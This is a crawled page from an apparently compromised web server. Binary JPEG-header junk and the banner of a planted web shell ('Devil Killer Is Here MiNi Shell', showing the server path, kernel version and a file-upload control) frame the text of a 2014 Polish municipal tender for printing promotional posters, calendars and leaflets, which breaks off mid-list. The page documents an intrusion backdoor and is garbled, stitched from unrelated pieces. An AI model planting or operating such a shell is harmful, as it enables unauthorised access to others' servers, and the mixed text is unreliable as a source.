JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140310/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140310/78884-N-2014.html

<p class="kh_header"><b>Dąbrowa Górnicza: Projekt i druk materiałów promocyjno -  informacyjnych miasta Dąbrowa Górnicza
zadanie I. Wykonanie materiałów promocyjno-informacyjnych miasta Dąbrowa Górnicza
zadanie II. Wykonanie materiałów reklamowych na billboardy</b><br>
<b>Numer ogłoszenia: 78884 - 2014; data zamieszczenia: 10.03.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Dąbrowa Górnicza , ul. Graniczna 21, 41-300 Dąbrowa Górnicza, woj. śląskie, tel. 32 2956700, faks 32 2625032, 2956700.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> bip.dabrowa-gornicza.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Projekt i druk materiałów promocyjno -  informacyjnych miasta Dąbrowa Górnicza
zadanie I. Wykonanie materiałów promocyjno-informacyjnych miasta Dąbrowa Górnicza
zadanie II. Wykonanie materiałów reklamowych na billboardy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Postępowanie o udzielenie zamówienia publicznego prowadzone jest w trybie przetargu nieograniczonego o wartości zamówienia poniżej kwoty dla dostaw i usług określonej w przepisach wydanych na podstawie art. 11 ust. 8 Ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych (Dz. U. z 2013 r., poz. 907 z późn. zm.).
I. Zadanie  I. Wykonanie materiałów promocyjno-informacyjnych miasta Dąbrowa Górnicza 
1.Projekt i druk plakatów
szacowany nakład  500 szt.
format B2
kolor 4+0
papier offset min. 100g
częstotliwość dostawy - jednorazowo
termin wykonania projektu plakatu  liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 2  dni
termin wykonania i dostarczenia do Zamawiającego plakatów liczony od dnia zaakceptowania projektu - nie dłużej niż  3 dni
2.Projekt i druk plakatów - wydarzenia - Miejskie Centrum Informacji
szacowany nakład  1 000 szt.
format B2
kolor 4+0
papier offset min. 100 g
częstotliwość dostawy - jednorazowo
termin wykonania projektu plakatów liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 2  dni
termin wykonania i dostarczenia do Zamawiającego plakatów liczony od dnia zaakceptowania projektu - nie dłużej niż  3 dni

3.Projekt i druk plakatów - wydarzenia Zagłębia
szacowany nakład  500 szt.
format B2
kolor 4+0
papier offset min. 100 g
częstotliwość dostawy - jednorazowo
termin wykonania projektu plakatów liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 2  dni
termin wykonania i dostarczenia do Zamawiającego plakatów liczony od dnia zaakceptowania projektu - nie dłużej niż  3 dni

4. Projekt i druk plakatów - WOŚP
szacowany nakład  300 szt.
format B2
kolor 4+0
papier offset min. 100 g
częstotliwość dostawy - jednorazowo
termin wykonania projektu plakatów liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 2  dni
termin wykonania i dostarczenia do Zamawiającego plakatów liczony od dnia zaakceptowania projektu - nie dłużej niż  3 dni

5.Projekt i druk plakatów - Letnia Scena Muzyczna
szacowany nakład  300 szt.
format B2
kolor 4+0
papier offset min. 100 g
częstotliwość dostawy - jednorazowo
termin wykonania projektu plakatów liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 2  dni
termin wykonania i dostarczenia do Zamawiającego plakatów liczony od dnia zaakceptowania projektu - nie dłużej niż  3 dni

6.Projekt i druk plakatów - Kryterium uliczne
szacowany nakład  200 szt.
format B2
kolor 4+0
papier offset min. 100 g
częstotliwość dostawy - jednorazowo
termin wykonania projektu plakatów liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 2  dni
termin wykonania i dostarczenia do Zamawiającego plakatów liczony od dnia zaakceptowania projektu - nie dłużej niż  3 dni

7.Projekt i druk plakatów - otwarcie Pałacu Kultury Zagłębia
szacowany nakład  500 szt.
format B2
kolor 4+0
papier offset min. 100 g
częstotliwość dostawy - jednorazowo
termin wykonania projektu plakatów liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 2  dni
termin wykonania i dostarczenia do Zamawiającego plakatów liczony od dnia zaakceptowania projektu - nie dłużej niż  3 dni

8.Projekt i druk plakatów
szacowany nakład  500 szt.
format B2
kolor 4+0
papier offset min. 100 g
częstotliwość dostawy - jednorazowo
termin wykonania projektu plakatów liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 2  dni
termin wykonania i dostarczenia do Zamawiającego plakatów liczony od dnia zaakceptowania projektu - nie dłużej niż  3 dni

9.Projekt i druk brulionu  w okładce
Szacowany nakład: 1 000 szt.
Format A5
Objętość: 100 kartek w bloczku
Środek: kolor 1+0, papier offset min. 80g
Okładka: kolor 4+0, papier kreda błysk min. 150g
Plecki: białe, bez nadruku, karton jednostronnie powlekany min. 250g
Klejenie po krótkim boku
częstotliwość dostawy - jednorazowo 
termin wykonania projektu brulionu od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 5 dni,
termin wykonania i dostarczenia do Zamawiającego brulionów liczony od dnia zaakceptowania projektu - nie dłużej niż 7 dni,  

10.Projekt i druk ulotki - Dąbrowski Rozkład Jazdy
szacowany nakład: 1000 sztuk  x 10 edycji
ilość edycji - 10 edycji (każda po 1000 sztuk)
format 100mmx210mm 
kolor 4+4 
papier kreda min. 135g
częstotliwość dostawy - jednorazowo dla każdej edycji
termin wykonania projektu ulotki liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 2 dni
termin wykonania i dostarczenia do Zamawiającego ulotek liczony od dnia zaakceptowania projektu - nie dłużej niż  3 dni     

11.Projekt i druk plakatu - Dąbrowski Rozkład Jazdy
szacowany nakład: 1 sztuka x 10 edycji
ilość edycji - 10 edycji (każda po 1 sztuce)
format 153 cm x 180 cm
kolor 4+0
papier prezentacyjny min. 140 g
częstotliwość dostawy - jednorazowo dla każdej edycji
termin wykonania projektu plakatu liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 2 dni
termin wykonania i dostarczenia do Zamawiającego plakatów liczony od dnia zaakceptowania projektu - nie dłużej niż  3 dni  

12.Projekt i druk plakatu - Dąbrowski Rozkład Jazdy
szacowany nakład: 1 sztuka x 10 edycji
ilość edycji - 10 edycji (każda po 1 sztuce)
format B1
kolor 4+0
papier prezentacyjny min. 140 g
częstotliwość dostawy - jednorazowo dla każdej edycji
termin wykonania projektu plakatu liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 2 dni
termin wykonania i dostarczenia do Zamawiającego plakatów liczony od dnia zaakceptowania projektu - nie dłużej niż  3 dni

13.Projekt i druk plakatów 
szacowany nakład: 1 sztuka x 12 edycji
ilość edycji - 12 edycji (każda po 1 sztuce)
format 153cm x180cm
kolor 4+0
papier prezentacyjny min. 140 g
częstotliwość dostawy - jednorazowo dla każdej edycji
termin wykonania projektu plakatu liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 2 dni
termin wykonania i dostarczenia do Zamawiającego plakatów liczony od dnia zaakceptowania projektu - nie dłużej niż  3 dni

14. Projekt i druk naklejek z herbem 
szacowany nakład: 500 sztuk
format 65 x 25 mm 
Kolor 4+0
Papier samoprzylepny
Lakier UV błysk jednostronnie
częstotliwość dostawy - jednorazowo
termin wykonania projektu naklejki liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 2 dni
termin wykonania i dostarczenia naklejek do Zamawiającego - nie dłużej niż 7 dni

15. Projekt i druk naklejek z herbem 
szacowany nakład: 500 sztuk
format 130 x 50 mm 
Kolor 4+0
Papier samoprzylepny
Lakier UV błysk jednostronnie
częstotliwość dostawy - jednorazowo
termin wykonania projektu naklejki liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 2 dni
termin wykonania i dostarczenia naklejek do Zamawiającego - nie dłużej niż 7 dni

16. Projekt i druk notesów - Dębowy Świat 
Szacowany nakład: 700 sztuk
Notes w twardej oprawie ze znacznikami
Twarda oprawa z tektury litej 1,75 mm o wym. 106 x 80mm (zamknięta)
Okleina: papier kredowy min. 130g
druk: 4+0; folia błysk
Notes samoprzylepny: papier samoprzylepny biały min. 80g; format 100 x 75mm (klej na boku 100mm)/100 kartek; druk: 1+0 bez spadów
Notes samoprzylepny: papier samoprzylepny biały 80g; format ca 50 x 75mm (klej na boku 50mm)/25 kartek; druk: 1+0 bez spadów
Znaczniki indeksujące PET: zestaw 5 szt. foliowych znaczników; format 12 x 45 mm/20 kartek (kolory: różowy, pomarańczowy, żółty, zielony, niebieski) na podkładce
Pakowanie: po 1 szt. w worek foliowy
termin wykonania projektu notesu liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 2 dni
termin wykonania i dostarczenia notesów do Zamawiającego - nie dłużej niż 7 dni

17. Projekt i druk kolorowanek dla dzieci
Szacowany nakład: 500 szt.
rozmiar A5
Środek: kolor 1+1, papier offset min. 80g
Okładka: kolor 4+4, papier kreda błysk min. 150g
Oprawa: szycie zeszytowe na 2 zszywki
Klejenie po krótkim boku
termin wykonania projektu kolorowanki liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 2 dni
termin wykonania i dostarczenia do Zamawiającego kolorowanek liczony od dnia zaakceptowania projektu - nie dłużej niż 7 dni

18.Projekt i druk kalendarza 13 planszowego
Szacowany nakład - 500 sztuk
Format A2
podkładka kartonowa, oprawa spiralna,
okładka min.300 g z laminowaniem błysk kolor  1+0
środek 12 kart kreda błysk min. 170 g.
kolor pełny 4+0
częstotliwość dostawy - jednorazowo
termin wykonania projektu kalendarza liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 4 dni
termin wykonania i dostarczenia do Zamawiającego kalendarzy liczony od dnia zaakceptowania projektu - nie dłużej niż  10 dni 


19.Projekt i druk kalendarza ściennego - planera 
Szacowany nakład: 400 sztuk
Format: 980 x 670 mm
kolor 4+0
papier kreda błysk min. 200 g
folia błysk jednostronnie
bez oprawy
częstotliwość dostawy - jednorazowo
termin wykonania projektu kalendarza liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 7  dni
termin wykonania i dostarczenia do Zamawiającego kalendarzy liczony od dnia zaakceptowania projektu - nie dłużej niż 7 dni

20.Projekt i druk kalendarza trójdzielnego 
Szacowany nakład: 1000 szt.
wymiar kalendarza 320x855mm 
wymiar główki 320x210cm 
główka - kolor 4+0, folia błysk, główka oprawiona z efektem wypukłości 
plecki - karton jednostronnie powlekany min. 250g, kolor 4+0
kalendarium: wymiar 290x135mm, kolor 2+0, papier offset min. 80g 
dziurka do zamocowania 
pasek z przesuwnym okienkiem
koperta kartonowa
częstotliwość dostawy - jednorazowo
termin wykonania projektu kalendarza liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 3  dni
termin wykonania i dostarczenia do Zamawiającego kalendarzy liczony od dnia zaakceptowania projektu - nie dłużej niż 7 dni

21.Projekt i druk kalendarza planszowego
Szacowany nakład 500 sztuk
format B1
kolor 4+0
papier kreda min. 200 g błysk
folia błysk jednostronnie
listwy srebrne góra-dół z zawieszką po krótszym boku
częstotliwość dostawy - jednorazowo
termin wykonania projektu kalendarza liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 7  dni
termin wykonania i dostarczenia do Zamawiającego kalendarzy liczony od dnia zaakceptowania projektu - nie dłużej niż 7 dni  

22.Projekt i druk kartek świątecznych - Boże Narodzenie
Szacowany nakład: 400 szt.
format 135 mm x 270 mm (po złożeniu 135 mm x 135 mm) 
Kolor 4+4
Papier kreda mat min. 300g
Okładka z papieru kartonowego ozdobnego, na okładce naklejony symbol świąteczny imitujący drewno
W środku papierowa wkładka z życzeniami w formacie 135 mm x 270 mm
częstotliwość dostawy - jednorazowo
termin wykonania projektu kartki  liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 2 dni
termin wykonania i dostarczenia do Zamawiającego kartek liczony od dnia zaakceptowania projektu - nie dłużej niż  4  dni

23.Projekt i druk kartek świątecznych - Wielkanoc
Szacowany nakład: 400 szt.
format 135 mm x 270 mm (po złożeniu 135 mm x 135 mm) 
Kolor 4+4
Papier kreda mat min. 300g
Okładka z papieru kartonowego ozdobnego, na okładce naklejony symbol świąteczny imitujący drewno 
W środku papierowa wkładka z życzeniami w formacie 135 mm x 270 mm
częstotliwość dostawy - jednorazowo
termin wykonania projektu kartki  liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 2 dni
termin wykonania i dostarczenia do Zamawiającego kartek liczony od dnia zaakceptowania projektu - nie dłużej niż  4  dni

24.Projekt i druk kartki okolicznościowej
Szacowany nakład 4 x 250 sztuk
4 różne projekty
format 105x148 mm - standardowy format karty pocztowej
kolor 4+4
papier min. 250g sztywny karton, dwustronnie bielony - folia błyszcząca jednostronna
częstotliwość dostawy - jednorazowo dla każdego projektu
termin wykonania projektów kartek  liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 2 dni
termin wykonania i dostarczenia do Zamawiającego kartek liczony od dnia zaakceptowania projektu - nie dłużej niż  3  dni

25.Projekt i druk zaproszeń 
Szacowany nakład: 700 szt. (2 edycje - pierwsza po 300 szt., druga po 400 szt., dwa różne projekty graficzne)
format A4 składane na 3 części
kolor 4+4
papier kreda min. 250g, folia matowa, UV wybiórczo na całości
personalizacja zaproszeń
częstotliwość dostawy - jednorazowo dla każdej edycji
termin wykonania projektu zaproszenia liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 2  dni
termin wykonania i dostarczenia do Zamawiającego zaproszeń liczony od dnia zaakceptowania projektu - nie dłużej niż 3 dni

26. Projekt i druk plakatów 
Szacowany nakład:  500 szt.
format B2
kolor 4+0
papier offset min. 100g
częstotliwość dostawy - jednorazowo
termin wykonania projektu plakatu liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 2  dni
termin wykonania i dostarczenia do Zamawiającego plakatów liczony od dnia zaakceptowania projektu - nie dłużej niż  3 dni  

27.Projekt i druk ulotek
Szacowany nakład 1 600 szt. (2 edycje po 800 szt., dwa różne projekty graficzne)
format A5 
kolor 4+4
papier offset min. 100g
częstotliwość dostawy jednorazowo
termin wykonania projektu ulotki liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 2 dni
termin wykonania i dostarczenia ulotek do Zamawiającego liczony od dnia zaakceptowania projektu - nie dłużej niż 7 dni
  
28.Projekt i druk plakatu (VIII Międzynarodowy Konkurs Muzyczny im. Michała Spisaka)
Szacowany nakład 100 sztuk
format B2
pełny kolor jednostronnie
papier kreda min. 170 g błysk
częstotliwość dostawy - jednorazowo
termin wykonania projektu plakatu liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 7  dni
termin wykonania i dostarczenia do Zamawiającego plakatów liczony od dnia zaakceptowania projektu - nie dłużej niż   7  dni

29.Projekt i druk zaproszeń (VIII Międzynarodowy Konkurs Muzyczny im. Michała Spisaka)
Szacowany nakład  700 sztuk
format A4 dzielone na 3
kolor 4+4
papier kreda min. 300 g
personalizacja zaproszeń
częstotliwość dostawy - jednorazowo
termin wykonania projektu zaproszenia liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 7  dni
termin wykonania i dostarczenia do Zamawiającego zaproszeń liczony od dnia zaakceptowania projektu - nie dłużej niż  7 dni

30.Projekt i druk dyplomów (VIII Międzynarodowy Konkurs Muzyczny im. Michała Spisaka)
Szacowany nakład 400 sztuk
format A4
pełny kolor jednostronnie
papier  kreda min. 300 g
częstotliwość dostawy - jednorazowo
termin wykonania projektu dyplomu liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 7  dni
termin wykonania i dostarczenia do Zamawiającego dyplomów liczony od dnia zaakceptowania projektu - nie dłużej niż   7  dni  

31. Projekt i druk plakatu zapowiadającego IX Międzynarodowy Konkurs Muzyczny im. Michała Spisaka 
Szacunkowy nakład: 300 sztuk wersja angielska, 300 sztuk wersja polska
format B2
pełny kolor jednostronnie
papier kreda min. 170 g błysk
częstotliwość dostawy - jednorazowo
termin wykonania projektu plakatów liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 7  dni
termin wykonania i dostarczenia do Zamawiającego plakatów liczony od dnia zaakceptowania projektu - nie dłużej niż   7  dni 

32.Projekt i druk plakatów - Dni Dąbrowy Górniczej
Szacunkowy nakład 100 sztuk
format B1
kolor 4+0
papier offset min. 100g
częstotliwość dostawy - jednorazowo
termin wykonania projektu plakatu liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 7 dni
termin wykonania i dostarczenia do Zamawiającego plakatów liczony od dnia zaakceptowania projektu - nie dłużej niż 7 dni  

33.Projekt i druk ulotek - Dni Dąbrowy Górniczej
Szacowany nakład: 2000 szt.
format A5, dwustronna
kolor 4+4
papier offset min. 100g
częstotliwość dostawy jednorazowo
termin wykonania projektu ulotki liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 2 dni
termin wykonania i dostarczenia ulotek do Zamawiającego liczony od dnia zaakceptowania projektu - nie dłużej niż 7 dni

34.Projekt i druk plakatów - Festiwal Ludzi Aktywnych i Dożynki Miejskie
Szacunkowy nakład: 300 sztuk
format B2
kolor 4+0
papier offset min. 100g
częstotliwość dostawy - jednorazowo
termin wykonania projektu plakatów liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 7 dni
termin wykonania i dostarczenia do Zamawiającego plakatów liczony od dnia zaakceptowania projektu - nie dłużej niż 7 dni

35.Projekt i druk zaproszeń - Dożynki Miejskie
szacowany nakład 300 sztuk
format A4 dzielone na 3
kolor 4+4
papier kreda min. 200g
personalizacja zaproszeń
częstotliwość dostawy - jednorazowo
termin wykonania projektu zaproszenia  liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 7 dni
termin wykonania i dostarczenia do Zamawiającego zaproszeń liczony od dnia zaakceptowania projektu - nie dłużej niż 7 dni 

36.Projekt i druk znaczków typu Quick-button
Szacowany nakład 500 sztuk
średnica 55 mm
nadruk w pełnym kolorze 4+0
częstotliwość dostawy - jednorazowo
termin wykonania projektu quickbuttonów  liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 7 dni
termin wykonania i dostarczenia do Zamawiającego quickbuttonów liczony od dnia zaakceptowania projektu - nie dłużej niż 7 dni

37.Projekt i druk publikacji Dożynki 2014
Szacowany nakład 1000 szt.
format A5
objętość: 16 str. + okładka
okładka: papier kreda błysk min. 300g, kolor 4+4
środek: papier kreda błysk min. 150g, kolor 4+4
szycie zeszytowe, częstotliwość dostawy - jednorazowo
termin wykonania projektu publikacji liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 2 dni
termin wykonania i dostarczenia  publikacji do Zamawiającego liczony od dnia zaakceptowania projektu - nie dłużej niż  2 dni

38.Projekt i druk plakatu - Dąbrowski Kiermasz Świąteczny
Szacowany nakład: 100 szt.
format B2
kolor 4+0
papier kreda min. 150g
częstotliwość dostawy - jednorazowo
termin wykonania projektu plakatu liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 7 dni
termin wykonania i dostarczenia do Zamawiającego plakatów liczony od dnia zaakceptowania projektu - nie dłużej niż  7   dni  

39.Projekt i druk zaproszeń (Koncert Noworoczny)
szacowany nakład 300 sztuk
format A4 dzielone na 3
kolor 4+4
papier kreda min. 200 g
personalizacja zaproszeń
częstotliwość dostawy - jednorazowo
termin wykonania projektu zaproszenia liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 7 dni
termin wykonania i dostarczenia do Zamawiającego zaproszeń liczony od dnia zaakceptowania projektu - nie dłużej niż  7  dni
   
40.Projekt i druk zaproszeń 11 listopada
szacowany nakład 200 sztuk
format A4 dzielone na 3
kolor 4+4
papier kreda min. 250 g,
personalizacja zaproszeń
częstotliwość dostawy - jednorazowo
termin wykonania projektu zaproszenia  liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 7 dni
termin wykonania i dostarczenia do Zamawiającego zaproszeń liczony od dnia zaakceptowania projektu - nie dłużej niż   7  dni
  
41.Projekt i druk plakatów 11 listopada
szacowany nakład - 100 sztuk
format B2
papier - offset min.  100g
kolor 4+0
częstotliwość dostawy - jednorazowo
termin wykonania projektu plakatu liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 7 dni
termin wykonania i dostarczenia do Zamawiającego plakatów liczony od dnia zaakceptowania projektu - nie dłużej niż  7 dni
  
42. Projekt i druk kalendarza zapowiadającego IX Międzynarodowy Konkurs Muzyczny im. Michała Spisaka 
Szacowany nakład: 400 sztuk
format B1
kolor 4+0
papier kreda min. 200 g błysk
folia błysk jednostronnie
listwy srebrne góra-dół z zawieszką po krótszym boku
częstotliwość dostawy - jednorazowo
termin wykonania projektu kalendarza liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 7  dni
termin wykonania i dostarczenia do Zamawiającego kalendarzy liczony od dnia zaakceptowania projektu - nie dłużej niż 7 dni

43.Projekt i druk książeczki - Informatora Festiwalu Zagłębie Wood
Szacowany nakład 4000 szt.
format A5 składana do formatu A6
kolor 4+4
papier kreda mat min. 170g
liczba stron: 32 z okładką
Oprawa: szycie zeszytowe na 2 zszywki
częstotliwość dostawy jednorazowo
termin wykonania projektu ulotki liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 2 dni
termin wykonania i dostarczenia ulotek do Zamawiającego liczony od dnia zaakceptowania projektu - nie dłużej niż 7 dni

44.Projekt i druk plakatu -  Zagłębie Wood
Szacowany nakład 200 sztuk
format B1
kolor 4+0
papier offset min. 100g
częstotliwość dostawy - jednorazowo
termin wykonania projektu plakatu liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 7 dni
termin wykonania i dostarczenia do Zamawiającego plakatów liczony od dnia zaakceptowania projektu - nie dłużej niż 7 dni

45.Projekt i druk plakatów - Puchar Polski w zapasach 
Szacowany nakład  500 szt.
format B2
kolor 4+0
papier offset  min.  100g
częstotliwość dostawy - jednorazowo
termin wykonania projektu plakatu liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 2  dni
termin wykonania i dostarczenia do Zamawiającego plakatów liczony od dnia zaakceptowania projektu - nie dłużej niż  3 dni

46. Projekt i druk ulotek - Dębowy Maj Festiwal
Szacowany nakład 3000 szt.
format A3 składana do formatu 297 x 105 mm
kolor 4+4
papier offset min. 150g
częstotliwość dostawy jednorazowo
termin wykonania projektu ulotki liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 2 dni
termin wykonania i dostarczenia ulotek do Zamawiającego liczony od dnia zaakceptowania projektu - nie dłużej niż 7 dni

47. Projekt i druk plakatów - Dębowy Maj Festiwal
Szacowany nakład  200 szt.
format B1
kolor 4+0
papier offset min. 100g
częstotliwość dostawy - jednorazowo
termin wykonania projektu plakatu liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 2 dni
termin wykonania i dostarczenia do Zamawiającego plakatów liczony od dnia zaakceptowania projektu - nie dłużej niż  3 dni

48.Projekt i druk plakatów - Skandia Maraton MTB 
Szacowany nakład  250 szt.
format B2
kolor 4+0
papier offset  min.  100g
częstotliwość dostawy - jednorazowo
termin wykonania projektu plakatu liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 2  dni
termin wykonania i dostarczenia do Zamawiającego plakatów liczony od dnia zaakceptowania projektu - nie dłużej niż  3 dni
  
49. Projekt i druk ulotek -  Skandia Maraton MTB
